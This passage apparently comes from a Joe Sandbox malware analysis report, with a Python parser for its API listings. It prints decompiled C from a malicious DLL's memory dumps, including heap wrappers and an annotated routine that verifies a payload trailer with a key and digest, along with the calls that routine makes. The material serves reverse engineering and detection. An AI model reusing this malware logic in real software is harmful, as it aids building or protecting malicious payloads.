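    base: Optional[int] = None
    protect: Optional[str] = None


def parse_listing(text: str) -> List[Record]:
    """One Record per report entry; an entry ends at its 'Uniqueness Score' line."""
    records, cur, quality, in_apis = [], None, None, False
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("C-Code - Quality:"):
            quality = int(re.search(r"(\d+)%", s).group(1))
            continue
        m = FUNC_RE.match(line)
        if m:
            cur = Record(m.group("name"), quality)
            continue
        if s == "APIs":
            if cur is None:                 # entry without a C-Code block (assembly-only function)
                cur = Record("", quality)
            in_apis = True
            continue
        if in_apis:
            m = API_RE.match(line)
            if m:
                if m.group("sub"):
                    cur.subcalls.append((m.group("sub"), m.group("name"), m.group("module"), m.group("ref")))
                else:
                    cur.apis.append((m.group("name"), m.group("module"), m.group("ref")))
                    if not cur.function:    # name unnamed entries after their first direct call site
                        cur.function = "unnamed@" + m.group("ref")
                continue
            in_apis = False                 # first non-bullet line closes the API list
        m = SRC_RE.search(s)
        if m and cur is not None:
            cur.source = m.group("file")
            cur.base = int(m.group("off"), 16)
            fields = cur.source.split(".")
            cur.protect = PAGE_PROTECT.get(int(fields[4], 16), "0x" + fields[4])
            continue
        if s.startswith("Uniqueness Score") and cur is not None:
            records.append(cur)
            cur, quality, in_apis = None, None, False
    return records


def apis_by_module(records: List[Record]) -> dict:
    """Module -> sorted API names, counting both direct calls and subcall entries."""
    out = {}
    for r in records:
        for name, module, _ in r.apis:
            out.setdefault(module, set()).add(name)
        for _, name, module, _ in r.subcalls:
            out.setdefault(module, set()).add(name)
    return {m: sorted(v) for m, v in out.items()}


def functions_calling(records: List[Record], api: str) -> List[str]:
    """Functions whose record (directly or through a listed subcall) reaches the given API."""
    return [r.function for r in records
            if any(a[0] == api for a in r.apis) or any(s[1] == api for s in r.subcalls)]


# Constructed sample: two records copied from the listing on this page.
SAMPLE = """\
C-Code - Quality: 89%
            E036D2E4E(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                char _v8;
                return _t26;
            }

APIs
  • Part of subcall function 036D1C03: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 036D1C1B
  • Part of subcall function 036D3B58: lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 036D3B8C
  • Part of subcall function 036D3B58: StrStrA.SHLWAPI(00000000,?), ref: 036D3B99
  • Part of subcall function 036D3B58: RtlAllocateHeap.NTDLL(00000000,?), ref: 036D3BB8
• RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,036D553D), ref: 036D2EA4
Memory Dump Source
• Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 06293090
  • Part of subcall function 062931E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,06270000), ref: 0629325C
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for r in recs:
        print(r.function, r.quality, hex(r.base), r.protect,
              [a[0] for a in r.apis], [s[1] for s in r.subcalls])
    print(apis_by_module(recs))
```

Feeding the whole exported listing through `parse_listing` and then `apis_by_module` gives the import-by-behaviour view that a packed sample hides from static tools; `functions_calling(recs, "RtlFreeHeap")` is the quick way to find every routine that touches the global heap seen in the wrappers further down.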

                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 06293090
                                                            • Part of subcall function 062931E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,06270000), ref: 0629325C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                                          • String ID:
                                                          • API String ID: 123106877-0
                                                          • Opcode ID: c9649fa4e249f55a1e38eedf8ba31624d8c0adcba604ae14b17e776ccd4530a9
                                                          • Instruction ID: ae039701989c8d0079a6432c4ccfe904b284c876123889c8ab31ede094326f7d
                                                          • Opcode Fuzzy Hash: c9649fa4e249f55a1e38eedf8ba31624d8c0adcba604ae14b17e776ccd4530a9
                                                          • Instruction Fuzzy Hash: 96A001962B9601BD3BE8A2516D87C3B169CD6E1A223208A2EFC2294050A8C35E8900B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 06293090
                                                            • Part of subcall function 062931E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,06270000), ref: 0629325C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                                          • String ID:
                                                          • API String ID: 123106877-0
                                                          • Opcode ID: 0458ad9e0bb870e441879038194a83a691b8f06006803c0456c94693c384dfae
                                                          • Instruction ID: d26ace2bc81afc434034a9b9ac368f7b3755bb49d85255fb6f350ab2874bea42
                                                          • Opcode Fuzzy Hash: 0458ad9e0bb870e441879038194a83a691b8f06006803c0456c94693c384dfae
                                                          • Instruction Fuzzy Hash: 2EA001962B9202BD3BD8A2516D87C3B169CD6C5A613208D2EEC2284050A8C35E8900B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
			// Thin allocator wrapper: _a4 bytes from the module's global heap, whose handle is stored at
			// 0x36da2d8 (the same handle E036D2E4E frees to). Flags are 0, so the memory is not zeroed.
			E036D6D63(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x36da2d8, 0, _a4); // executed
				return _t2;
			}

Instruction addresses of E036D6D63 (alignment with the C-code lines lost in extraction): 0x036d6d6f and 0x036d6d75.


                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: b3fd2b881123f03a4daf9992ab3a036caac26b7cb8a8dd130e3e7dcfaadc8c0a
                                                          • Instruction ID: fa14f844f02c862e0f8a0f24de79bd1cf25e343d133ee38c56365670eb9a2448
                                                          • Opcode Fuzzy Hash: b3fd2b881123f03a4daf9992ab3a036caac26b7cb8a8dd130e3e7dcfaadc8c0a
                                                          • Instruction Fuzzy Hash: 0CB01231805200ABCF016F41FD08F057B61BB90700F045014B2088007C83330470FB08
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
			// Counterpart of E036D6D63: returns _a4 to the global heap at 0x36da2d8. The BOOLEAN
			// result of RtlFreeHeap is passed straight back to the caller.
			E036D6C2C(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x36da2d8, 0, _a4); // executed
				return _t2;
			}

Instruction addresses of E036D6C2C (alignment with the C-code lines lost in extraction): 0x036d6c38 and 0x036d6c3e.


                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 8cfb79287d6921752eae8e71c27fc75fcdc45a68263e5745e310dbe4066ad72f
                                                          • Instruction ID: 2935100abf8e2c2d01c0ab0b098571bf93c537754099d5621233f0bb1f23a59f
                                                          • Opcode Fuzzy Hash: 8cfb79287d6921752eae8e71c27fc75fcdc45a68263e5745e310dbe4066ad72f
                                                          • Instruction Fuzzy Hash: DDB01271905200ABCF116B41FE04F057A61AB90700F045014B3049007C83320430FB19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 6c718772c40f38211285d1a7882b29d00288d3b6c6cde8ab4adf9a9226c8de15
                                                          • Instruction ID: 2a50a735b23c7111863a2d1e14fde9a98b0faf5100b415977a09a699883a3b05
                                                          • Opcode Fuzzy Hash: 6c718772c40f38211285d1a7882b29d00288d3b6c6cde8ab4adf9a9226c8de15
                                                          • Instruction Fuzzy Hash: A7B01271200300ABCB024F01FE0DF057B23A7D4700F004010B30C5406082310424FF24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 0e478a6c38cc95b63d198cb703dde4e861fcc1f17b267a581ccac913bcdbdff0
                                                          • Instruction ID: 812802d72c0a752fa9fe6cb3271ea46af24650150b4afbabf2bf2a73f9c27905
                                                          • Opcode Fuzzy Hash: 0e478a6c38cc95b63d198cb703dde4e861fcc1f17b267a581ccac913bcdbdff0
                                                          • Instruction Fuzzy Hash: E3B01231100300ABCB024F00FD0EF057B23ABD4700F004410B30C9006082310468FF24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
			// Checks a data buffer against a 0x80-byte trailer and a key structure, then either returns a
			// verified heap copy of the data through _a8 or hands the data to E036D5FBB. The code is the
			// decompiler's; the comments are the editor's reading of it and say where they are inferred.
			// __eax: key structure whose first dword must be 0x400 (1024; a 1024-bit key is the natural
			//        match for a 0x80 = 128-byte trailer, inference). __ecx: total size of the input.
			// _a4: input data. _a8: receives the verified copy.
			E036D13C7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;          // heap copy of the input
				int _v12;
				char _v16;
				intOrPtr _v20;      // _v32.._v20: 16-byte value computed over the copy by E036D6EE7
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;          // length field recovered from the trailer
				intOrPtr _v152;     // _v164.._v152: 16-byte value recovered from the trailer
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {   // too small to carry a trailer, or unexpected key size
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E036D6FD0(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);   // process the last 0x80 bytes with the key into _v164..
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {   // the recovered length must fit in the data that precedes the trailer
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {   // scan 0x10 bytes after the length field for a non-zero byte
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						// all zero: copy _v148 bytes of input, recompute the 16-byte value and compare it with the recovered one
						_t53 = _v148;
						_t51 = E036D6D63(_t53);   // RtlAllocateHeap wrapper (global heap at 0x36da2d8)
						_v8 = _t51;
						_t73 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E036D6C2C(_v8);   // RtlFreeHeap wrapper
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E036D6EE7(_t58, _t73, _t63, _t53,  &_v32);   // 16-byte value over the copy (a digest, inference)
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {   // dword-wise compare of the two 16-byte values
							L15:
							_t53 = 0;
							goto L19;   // mismatch: release the copy
						} else {
							 *_a8 = _t63;   // match: hand the copy to the caller
							goto L18;
						}
					}
					// a non-zero byte was found: the data, with its size rounded down to a multiple of 16, goes to E036D5FBB instead
					_t58 =  &_v144;
					_t42 = E036D5FBB(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
                                                          					if(_t42 != 0) {
                                                          						_t53 = _v12;
                                                          						goto L18;
                                                          					}
                                                          					_t53 = _v148;
                                                          					__eflags = _v12 - _t53;
                                                          					if(__eflags >= 0) {
                                                          						goto L8;
                                                          					}
                                                          					goto L15;
                                                          				}
                                                          			}
                                                          Instruction addresses: 0x036d13d2, 0x036d13d5, 0x036d13dc, 0x036d13df, 0x036d13e2, 0x036d13e7, 0x036d14e3, 0x036d14e7, 0x036d13f9, 0x036d1405, 0x036d140c, 0x036d1413, 0x00000000, 0x00000000, 0x036d1419, 0x036d1421, 0x00000000, 0x00000000, 0x036d1427, 0x036d1430, 0x036d1434, 0x00000000, 0x00000000, 0x036d1436, 0x036d143d, 0x036d1442, 0x036d1445, 0x036d1447, 0x036d14c8, 0x036d14cf, 0x036d14d1, 0x00000000, 0x00000000, 0x036d14d3, 0x036d14d7, 0x036d14dc, 0x036d14dc, 0x00000000, 0x036d14d7, 0x036d144e, 0x036d1456, 0x036d1456, 0x036d145f, 0x036d146d, 0x036d14c4, 0x036d14c4, 0x00000000, 0x036d1490, 0x036d1493, 0x00000000, 0x036d1493, 0x036d146d, 0x036d14a2, 0x036d14b0, 0x036d14b5, 0x036d14b7, 0x036d14cc, 0x00000000, 0x036d14cc, 0x036d14b9, 0x036d14bf, 0x036d14c2, 0x00000000, 0x00000000, 0x00000000, 0x036d14c2

                                                          APIs
                                                          • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,?,?), ref: 036D144E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID:
                                                          • API String ID: 3510742995-0
                                                          • Opcode ID: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                                                          • Instruction ID: fd4920c61e9fb45d3d2074d7e8ce38b7483c8cc352f6f949603e0c110e176619
                                                          • Opcode Fuzzy Hash: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                                                          • Instruction Fuzzy Hash: A2312F75D00219EFDF61DF94C980BEEB7B9BB06204F1444A9E509E7281D6709E49CB70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                            • Part of subcall function 06291ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                            • Part of subcall function 06291ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,76CDF710,00000000,00000000,?,?,?,0627E30A,?), ref: 0628FDB6
                                                            • Part of subcall function 0628AF83: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,062763CD,00000000,00000001,-00000007,?,00000000), ref: 0628AFA6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                                          • String ID:
                                                          • API String ID: 1301464996-0
                                                          • Opcode ID: 07d43bc317252f5fcf59a7c22f363c5973b2b43618303dcb2d532f43c7603513
                                                          • Instruction ID: a5b4175247a0bcd7ec6e77f86c0207d59be9a649ed1dfdd4e92109a77881fbb2
                                                          • Opcode Fuzzy Hash: 07d43bc317252f5fcf59a7c22f363c5973b2b43618303dcb2d532f43c7603513
                                                          • Instruction Fuzzy Hash: 6A11A772A31301AFDB95EB59DD84EAD77A9EF88390F100029EF01DB281D7B59D10CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memcpy.NTDLL(?,0629A324,00000018,06286FFC,06898E36,?,06286FFC,06898E36,?,06286FFC,06898E36,?,?,?,?,06286FFC), ref: 06282CB2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID:
                                                          • API String ID: 3510742995-0
                                                          • Opcode ID: 0868403b3672842e070397ac6809be7f8e549b90963a29ea38e88d8712355264
                                                          • Instruction ID: 38ed3ebaf0013a66e6650aa5bd3d68ab0a5a4d98594db974ebd9c53f25b0d21e
                                                          • Opcode Fuzzy Hash: 0868403b3672842e070397ac6809be7f8e549b90963a29ea38e88d8712355264
                                                          • Instruction Fuzzy Hash: A5112171A11305AFCB94EF66FC49CE637AAEBC53117458126EE188B291DB309511CFB8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                            • Part of subcall function 06291ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                            • Part of subcall function 06291ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 06277100
                                                            • Part of subcall function 06274963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,062770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 06274975
                                                            • Part of subcall function 06274963: StrChrA.SHLWAPI(?,00000020,?,00000000,062770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 06274984
                                                            • Part of subcall function 0627EE04: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0627EE2A
                                                            • Part of subcall function 0627EE04: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0627EE36
                                                            • Part of subcall function 0627EE04: GetModuleHandleA.KERNEL32(?,0689978E,00000000,?,00000000), ref: 0627EE56
                                                            • Part of subcall function 0627EE04: GetProcAddress.KERNEL32(00000000), ref: 0627EE5D
                                                            • Part of subcall function 0627EE04: Thread32First.KERNEL32(?,0000001C), ref: 0627EE6D
                                                            • Part of subcall function 0627EE04: CloseHandle.KERNEL32(?), ref: 0627EEB5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                                          • String ID:
                                                          • API String ID: 2627809124-0
                                                          • Opcode ID: 37e600883e118537eb531446466869d0b334b5fbfabb44d4bf0ddbb58b46e957
                                                          • Instruction ID: 9a337acc0d304fd693291562373fd486f69b3c2d3c104040a92830365b5effd8
                                                          • Opcode Fuzzy Hash: 37e600883e118537eb531446466869d0b334b5fbfabb44d4bf0ddbb58b46e957
                                                          • Instruction Fuzzy Hash: 48016271A20305FF9B51DBA9ED88CDFB7EDEF992547000055F911A3100DA31AE04DB70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                            • Part of subcall function 06291ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                            • Part of subcall function 06291ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,062804AC,0628C384,00000000,00000000), ref: 062915F0
                                                            • Part of subcall function 06274963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,062770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 06274975
                                                            • Part of subcall function 06274963: StrChrA.SHLWAPI(?,00000020,?,00000000,062770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 06274984
                                                            • Part of subcall function 06273172: lstrlen.KERNEL32(062743C6,00000000,?,?,?,?,062743C6,00000035,00000000,?,00000000), ref: 062731A2
                                                            • Part of subcall function 06273172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 062731B8
                                                            • Part of subcall function 06273172: memcpy.NTDLL(00000010,062743C6,00000000,?,?,062743C6,00000035,00000000), ref: 062731EE
                                                            • Part of subcall function 06273172: memcpy.NTDLL(00000010,00000000,00000035,?,?,062743C6,00000035), ref: 06273209
                                                            • Part of subcall function 06273172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 06273227
                                                            • Part of subcall function 06273172: GetLastError.KERNEL32(?,?,062743C6,00000035), ref: 06273231
                                                            • Part of subcall function 06273172: HeapFree.KERNEL32(00000000,00000000,?,?,062743C6,00000035), ref: 06273254
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                                          • String ID:
                                                          • API String ID: 730886825-0
                                                          • Opcode ID: c2f8dc5219499aab8ddfbd9fc8d3739a2c2185f86414e2db068af80457bf673c
                                                          • Instruction ID: 8255ec97290b10e3dd388e841aa452cdeb5e38939ac289c6d19721a77d76a983
                                                          • Opcode Fuzzy Hash: c2f8dc5219499aab8ddfbd9fc8d3739a2c2185f86414e2db068af80457bf673c
                                                          • Instruction Fuzzy Hash: 76015E31A20305BBDB61D799EC4DF9E77EDEF8A750F000054BA01A6180DA70AA01DBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • memset.NTDLL ref: 06284855
                                                            • Part of subcall function 0628A451: memset.NTDLL ref: 0628A477
                                                            • Part of subcall function 0628A451: memcpy.NTDLL ref: 0628A49F
                                                            • Part of subcall function 0628A451: GetLastError.KERNEL32(00000010,00000218,0629386D,00000100,?,00000318,00000008), ref: 0628A4B6
                                                            • Part of subcall function 0628A451: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0629386D,00000100), ref: 0628A599
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastmemset$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 4290293647-0
                                                          • Opcode ID: 81db9c59ef9475ba12f4df8786a5a15e42049630fcf77dc5d10bc676783333d9
                                                          • Instruction ID: db91922d3a94f05241a4ad3f193bd8158f641b8a7040146b000d224b67728fd5
                                                          • Opcode Fuzzy Hash: 81db9c59ef9475ba12f4df8786a5a15e42049630fcf77dc5d10bc676783333d9
                                                          • Instruction Fuzzy Hash: AE01F23092235A6FD7A1BE29DC08F8A3BE8AB45254F008429FC5886280D771D904CAE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D155C(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                                                          				void* _t21;
                                                          				void* _t22;
                                                          				signed int _t24;
                                                          				intOrPtr* _t26;
                                                          				void* _t27;
                                                          
                                                          				_t26 = __edi;
                                                          				if(_a4 == 0) {
                                                          					L2:
                                                          					_t27 = E036D12CA(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                          					if(_t27 == 0) {
                                                          						_t24 = _a12 >> 1;
                                                          						if(_t24 == 0) {
                                                          							_t27 = 2;
                                                          							HeapFree( *0x36da2d8, 0, _a4);
                                                          						} else {
                                                          							_t21 = _a4;
                                                          							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                                          							 *_t26 = _t21;
                                                          						}
                                                          					}
                                                          					L6:
                                                          					return _t27;
                                                          				}
                                                          				_t22 = E036D1B6F(_a4, _a8, _a12, __edi); // executed
                                                          				_t27 = _t22;
                                                          				if(_t27 == 0) {
                                                          					goto L6;
                                                          				}
                                                          				goto L2;
                                                          			}
                                                          Instruction addresses: 0x036d155c, 0x036d1564, 0x036d157b, 0x036d1596, 0x036d159a, 0x036d159f, 0x036d15a1, 0x036d15b3, 0x036d15bf, 0x036d15a3, 0x036d15a3, 0x036d15a8, 0x036d15ad, 0x036d15ad, 0x036d15a1, 0x036d15c5, 0x036d15c9, 0x036d15c9, 0x036d1570, 0x036d1575, 0x036d1579, 0x00000000, 0x00000000, 0x00000000

                                                          APIs
                                                            • Part of subcall function 036D1B6F: SysFreeString.OLEAUT32(00000000), ref: 036D1BD2
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76CDF710,?,00000000,?,00000000,?,036D21A9,?,004F0053,05969400,00000000,?), ref: 036D15BF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
